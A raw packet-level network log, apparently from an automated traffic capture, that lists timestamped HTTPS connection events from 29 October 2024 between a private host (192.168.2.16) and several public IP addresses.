                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:07.059946060 CET44349838142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:07.059992075 CET44349838142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:07.060014963 CET44349838142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:07.060061932 CET49838443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:07.060084105 CET44349838142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:07.060134888 CET49838443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:07.061223984 CET49838443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:07.061258078 CET44349838142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:07.061311007 CET49838443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:07.489346027 CET49839443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:07.489392996 CET44349839142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:07.489484072 CET49839443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:07.489785910 CET49839443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:07.489797115 CET44349839142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.369513035 CET44349839142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.369955063 CET49839443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.369982958 CET44349839142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.371063948 CET44349839142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.371155977 CET49839443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.371527910 CET49839443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.371601105 CET44349839142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.371732950 CET49839443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.371742964 CET44349839142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.371784925 CET49839443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.371824026 CET44349839142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.425796032 CET49839443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.648834944 CET44349839142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.648886919 CET44349839142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.648916006 CET44349839142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.648937941 CET44349839142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.648962021 CET44349839142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.649015903 CET49839443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.649017096 CET49839443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.649049997 CET44349839142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.649101973 CET49839443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.650408030 CET49839443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.650465965 CET44349839142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.650533915 CET49839443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.652991056 CET49840443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.653040886 CET44349840142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.653151989 CET49840443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.653301001 CET49841443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.653347015 CET44349841142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.653397083 CET49841443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.653575897 CET49840443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.653587103 CET44349840142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.653768063 CET49841443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:08.653784990 CET44349841142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.525311947 CET44349840142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.525681019 CET49840443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.525697947 CET44349840142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.526784897 CET44349840142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.526880980 CET49840443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.527179003 CET49840443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.527241945 CET44349840142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.527327061 CET49840443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.527335882 CET44349840142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.529227972 CET44349841142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.529436111 CET49841443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.529464006 CET44349841142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.530561924 CET44349841142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.530632973 CET49841443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.530936956 CET49841443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.531008959 CET44349841142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.531042099 CET49841443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.571335077 CET44349841142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.571764946 CET49840443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.571770906 CET49841443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.571788073 CET44349841142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.619967937 CET49841443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.798455954 CET44349841142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.798556089 CET44349841142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.798660040 CET49841443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.798674107 CET44349841142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.799907923 CET44349840142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.799966097 CET44349840142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.799998999 CET44349840142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.800014973 CET49840443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.800030947 CET44349840142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.800075054 CET49840443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.800081015 CET44349840142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.800510883 CET49840443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.800545931 CET44349840142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.800607920 CET49840443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.802974939 CET49843443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.803018093 CET44349843142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.803103924 CET49843443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.803324938 CET49843443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.803338051 CET44349843142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.843696117 CET49841443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.843709946 CET44349841142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.843899965 CET49841443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.843966007 CET44349841142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:09.844027996 CET49841443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:10.668679953 CET44349843142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:10.669172049 CET49843443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:10.669190884 CET44349843142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:10.670264006 CET44349843142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:10.670376062 CET49843443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:10.670698881 CET49843443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:10.670758009 CET44349843142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:10.670888901 CET49843443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:10.670897961 CET44349843142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:10.720781088 CET49843443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:10.935880899 CET44349843142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:10.935998917 CET44349843142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:10.936084986 CET49843443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:10.936096907 CET44349843142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:10.936122894 CET44349843142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:10.936209917 CET49843443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:10.936223984 CET44349843142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:10.976891994 CET49843443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:10.976910114 CET44349843142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:10.977185011 CET49843443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:10.977272034 CET44349843142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:10.977343082 CET49843443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:13.177736998 CET49844443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:13.177783012 CET44349844142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:13.177910089 CET49844443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:13.178234100 CET49844443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:13.178261042 CET44349844142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.041759968 CET44349844142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.042268991 CET49844443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.042299986 CET44349844142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.043375015 CET44349844142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.043587923 CET49844443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.043875933 CET49844443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.044007063 CET44349844142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.044017076 CET49844443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.044017076 CET49844443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.044068098 CET44349844142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.085854053 CET49844443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.085875988 CET44349844142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.131766081 CET49844443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.328222036 CET44349844142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.328286886 CET44349844142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.328401089 CET49844443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.328418970 CET44349844142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.329492092 CET49844443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.329555035 CET44349844142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.329677105 CET49844443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.332233906 CET49845443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.332281113 CET44349845142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.332386971 CET49845443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.332627058 CET49845443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.332640886 CET44349845142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.391056061 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.391134024 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.391256094 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.391637087 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.391657114 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.061309099 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.061842918 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.061865091 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.062962055 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.063070059 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.064675093 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.064723015 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.064809084 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.064851046 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.064912081 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.065476894 CET49847443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.065529108 CET44349847188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.065622091 CET49847443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.065954924 CET49847443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.065967083 CET44349847188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.230808973 CET44349845142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.231261015 CET49845443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.231290102 CET44349845142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.232347012 CET44349845142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.232451916 CET49845443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.232741117 CET49845443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.232796907 CET44349845142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.232947111 CET49845443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.232959032 CET44349845142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.282704115 CET49845443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.511522055 CET44349845142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.511575937 CET44349845142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.511630058 CET49845443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.511647940 CET44349845142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.512722015 CET49845443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.512809038 CET44349845142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.512871981 CET49845443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.682023048 CET44349847188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.682476997 CET49847443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.682507992 CET44349847188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.683592081 CET44349847188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.683691025 CET49847443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.685026884 CET49847443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.685126066 CET44349847188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.685208082 CET49847443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.685220957 CET44349847188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:15.729751110 CET49847443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:16.498796940 CET44349847188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:16.498917103 CET44349847188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:16.499005079 CET49847443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:16.499942064 CET49847443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:16.499957085 CET44349847188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:16.796705008 CET49850443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:16.796752930 CET44349850188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:16.796854019 CET49850443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:16.797200918 CET49850443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:16.797218084 CET44349850188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:17.407191038 CET44349850188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:17.407439947 CET49850443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:17.407465935 CET44349850188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:17.409025908 CET44349850188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:17.409101963 CET49850443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:17.409429073 CET49850443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:17.409441948 CET49850443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:17.409499884 CET49850443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:17.409529924 CET44349850188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:17.409594059 CET49850443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:17.409907103 CET49851443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:17.409945011 CET44349851188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:17.410017967 CET49851443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:17.410228014 CET49851443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:17.410239935 CET44349851188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.068233013 CET44349851188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.068672895 CET49851443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.068696022 CET44349851188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.069739103 CET44349851188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.069828987 CET49851443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.070126057 CET49851443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.070194006 CET44349851188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.070303917 CET49851443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.070317030 CET44349851188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.106101990 CET49854443192.168.2.16151.101.2.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.106134892 CET44349854151.101.2.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.106281996 CET49854443192.168.2.16151.101.2.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.107379913 CET49854443192.168.2.16151.101.2.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.107393980 CET44349854151.101.2.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.112220049 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.112240076 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.112303972 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.112484932 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.112498045 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.119642019 CET49851443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.726991892 CET44349854151.101.2.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.727344036 CET49854443192.168.2.16151.101.2.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.727359056 CET44349854151.101.2.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.728722095 CET44349854151.101.2.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.728785992 CET49854443192.168.2.16151.101.2.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.729913950 CET49854443192.168.2.16151.101.2.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.729981899 CET44349854151.101.2.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.771666050 CET49854443192.168.2.16151.101.2.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.771683931 CET44349854151.101.2.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.819644928 CET49854443192.168.2.16151.101.2.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.869618893 CET44349851188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.869754076 CET44349851188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.869818926 CET49851443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.871028900 CET49851443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.871052027 CET44349851188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:19.107964993 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:19.108333111 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:19.108345985 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:19.109410048 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:19.109507084 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:19.110594034 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:19.110662937 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:19.155677080 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:19.155695915 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:19.203634024 CET49861443192.168.2.16104.18.66.57
